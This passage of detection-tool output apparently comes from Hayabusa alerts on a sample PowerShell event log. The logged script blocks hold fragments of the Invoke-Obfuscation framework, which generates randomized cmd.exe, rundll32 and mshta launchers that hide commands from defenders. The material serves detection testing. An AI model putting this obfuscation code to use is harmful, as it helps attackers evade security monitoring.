$RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"Maximum 3) + $_ + ' '*(Get-Random -Minimum 0 -Maximum 3) + '""' + ' '*(Get-Random -Minimum 1 -Maximum 4)}) -Join '' # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $ExecutionFlagsRunDllSyntax + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$InvokeOption`"""" $RundllCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $Shell32Dll + (Get-Random -Input @(',',' ', ((Get-Random -Input @(',',',',',',' ',' ',' ') -Count (Get-Random -Input @(4..6)))-Join''))) + 'ShellExec_RunDLL' + ' '*(Get-Random -Minimum 1 -Maximum 4) + ""`""$PathToPowerShell`"""" + $PSCmdSyntax $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToRunDll + $RundllCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToRunDll , $RundllCmdSyntax) $ArgsDefenderWillSee += , @(""`""$PathToPowerShell`"""", $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } 12 { ############# ## MSHTA++ ## ############# # Undo one layer of escaping from beginning of function since we're only dealing with one level of cmd.exe escaping in this block. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",""^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^^') } # Switch cmd.exe escape with powershell.exe escape of double-quote. If($ScriptString.Contains('\""')) {$ScriptString = $ScriptString.Replace('\""','""')} # Choose random syntax for invoking command stored in process-level environment variable. # Generate random variable names to store the $ScriptString command and PowerShell syntax. $CharsForVarName = @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $VariableName = (Get-Random -Input $CharsForVarName -Count ($CharsForVarName.Count/(Get-Random -Input @(5..10)))) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random case syntax for setting the above random variable names. $SetSyntax = ([Char[]]'set' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SetSyntax = $SetSyntax + ' '*(Get-Random -Minimum 2 -Maximum 4) + $VariableName + '=' # Randomize the case of the following variables. $SetSyntax = ([Char[]]$SetSyntax.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $VariableName = ([Char[]]$VariableName.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Generate random syntax for invoking process-level environment variable syntax. # Keep calling Out-RandomInvokeRandomEnvironmentVariableSyntax until we get the shorter syntax (not using $ExecutionContext syntax) since mshta.exe has a short argument size limitation. $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') While($InvokeOption.Length -gt 200) { $InvokeOption = (Out-RandomInvokeRandomEnvironmentVariableSyntax $VariableName).Replace('\""',""'"").Replace('`','') } # Generate randomize case syntax for all available command arguments for mshta.exe. $CreateObject = ([Char[]]'VBScript:CreateObject' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WScriptShell = ([Char[]]'WScript.Shell' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Run = ([Char[]]'.Run' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $TrueString = ([Char[]]'True' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $WindowClose = ([Char[]]'Window.Close' | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Randomly decide whether to concatenate WScript.Shell or just encapsulate it with double quotes. If((Get-Random -Input @(0..1)) -eq 0) { $WScriptShell = Out-ConcatenatedString $WScriptShell '""' } Else { $WScriptShell = '""' + $WScriptShell + '""' } # Randomly decide whether or not to concatenate PowerShell command. If((Get-Random -Input @(0..1)) -eq 0) { # Concatenate $InvokeOption and unescape double quotes from the result. $SubStringArray += (Out-ConcatenatedString $InvokeOption.Trim('""') '""').Replace('`""','""') # Remove concatenation introduced in above step if it concatenates immediately after a cmd.exe escape character. If($InvokeOption.Contains('^""+""')) { $InvokeOption = $InvokeOption.Replace('^""+""','^') } } # Random choose between using the numeral 1 and using a random subtraction syntax that is equivalent to 1. If((Get-Random -Input @(0..1)) -eq 0) { $One = 1 } Else { # Randomly select between two digit and three digit subtraction syntax. $RandomNumber = Get-Random -Minimum 3 -Maximum 25 If(Get-Random -Input @(0..1)) { $One = [String]$RandomNumber + '-' + ($RandomNumber-1) } Else { $SecondRandomNumber = Get-Random -Minimum 1 -Maximum $RandomNumber $One = [String]$RandomNumber + '-' + $SecondRandomNumber + '-' + ($RandomNumber-$SecondRandomNumber-1) } # Randomly decide to encapsulate with parentheses (not necessary). If((Get-Random -Input @(0..1)) -eq 0) { $One = '(' + $One + ')' } } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption + '"",' + $One + ',' + $TrueString + "")($WindowClose)"" $MshtaCmdSyntax = ' '*(Get-Random -Minimum 1 -Maximum 4) + $CreateObject + ""($WScriptShell)"" + $Run + '(""' + $PathToPowerShell + $PSCmdSyntax + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + '""' + $SetSyntax + $ScriptString + '&&' + $PathToMshta + $MshtaCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToMshta , $MshtaCmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax.Replace('^','')) $CmdLineOutput = $PathToCmd + $CmdSyntax } default {Write-Error ""An invalid `$LaunchType value ($LaunchType) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } # Output process tree output format of applied launcher to help the Blue Team find indicators and the Red Team to better avoid detection. If($ArgsDefenderWillSee.Count -gt 0) { Write-Host ""`n`nProcess Argument Tree of ObfuscatedCommand with current launcher:"" $Counter = -1 ForEach($Line in $ArgsDefenderWillSee) { If($Line.Count -gt 1) { $Part1 = $Line[0] $Part2 = $Line[1] } Else { $Part1 = $Line $Part2 = '' } $LineSpacing = '' If($Counter -ge 0) { $LineSpacing = ' '*$Counter Write-Host ""$LineSpacing|`n$LineSpacing\--> "" -NoNewline } # Print each command and argument, handling if the argument length is too long to display coherently. Write-Host $Part1 -NoNewLine -ForegroundColor Yellow # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 If($Part2.Length -gt $CmdMaxLength) { # Output Part2, handling if the size of Part2 exceeds $CmdMaxLength characters. $RedactedPrintLength = $CmdMaxLength/5 # Handle printing redaction message in middle of screen. #OCD $CmdLineWidth = (Get-Host).UI.RawUI.BufferSize.Width $RedactionMessage = """" $CenteredRedactionMessageStartIndex = (($CmdLineWidth-$RedactionMessage.Length)/2) - ($Part1.Length+$LineSpacing.Length) $CurrentRedactionMessageStartIndex = ($RedactedPrintLength % $CmdLineWidth) If($CurrentRedactionMessageStartIndex -gt $CenteredRedactionMessageStartIndex) { $RedactedPrintLength = $RedactedPrintLength-($CurrentRedactionMessageStartIndex-$CenteredRedactionMessageStartIndex) } Else { $RedactedPrintLength = $RedactedPrintLength+($CenteredRedactionMessageStartIndex-$CurrentRedactionMessageStartIndex) } Write-Host $Part2.SubString(0,$RedactedPrintLength) -NoNewLine -ForegroundColor Cyan Write-Host $RedactionMessage -NoNewLine -ForegroundColor Magenta Write-Host $Part2.SubString($Part2.Length-$RedactedPrintLength) -ForegroundColor Cyan } Else { Write-Host $Part2 -ForegroundColor Cyan } $Counter++ } Start-Sleep 1 } # Make sure final command doesn't exceed cmd.exe's character limit. # Only apply this check to LaunchType values less than 13 since all the other launchers are not command line launchers. $CmdMaxLength = 8190 If(($CmdLineOutput.Length -gt $CmdMaxLength) -AND ($LaunchType -lt 13)) { Write-Host """" Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" Start-Sleep 1 } Return $CmdLineOutput } Function Out-RandomInvokeRandomEnvironmentVariableSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized syntax for invoking a process-level environment variable. Invoke-Obfuscation Function: Out-RandomInvokeRandomEnvironmentVariableSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomInvokeRandomEnvironmentVariableSyntax generates random invoke syntax and random process-level environment variable retrieval syntax for invoking command contents that are stored in a user-input process-level environment variable. This function is primarily used as a helper function for Out-PowerShellLauncher. .PARAMETER EnvVarName User input string or array of strings containing environment variable names to randomly select and apply invoke syntax. .EXAMPLE C:\PS> Out-RandomInvokeRandomEnvironmentVariableSyntax 'varname' .(\""In\"" +\""v\"" + \""o\""+ \""Ke-ExpRes\""+ \""sION\"" ) (^&( \""GC\"" +\""i\"" ) eNV:vaRNAMe ).\""V`ALue\"" .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options wher",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = 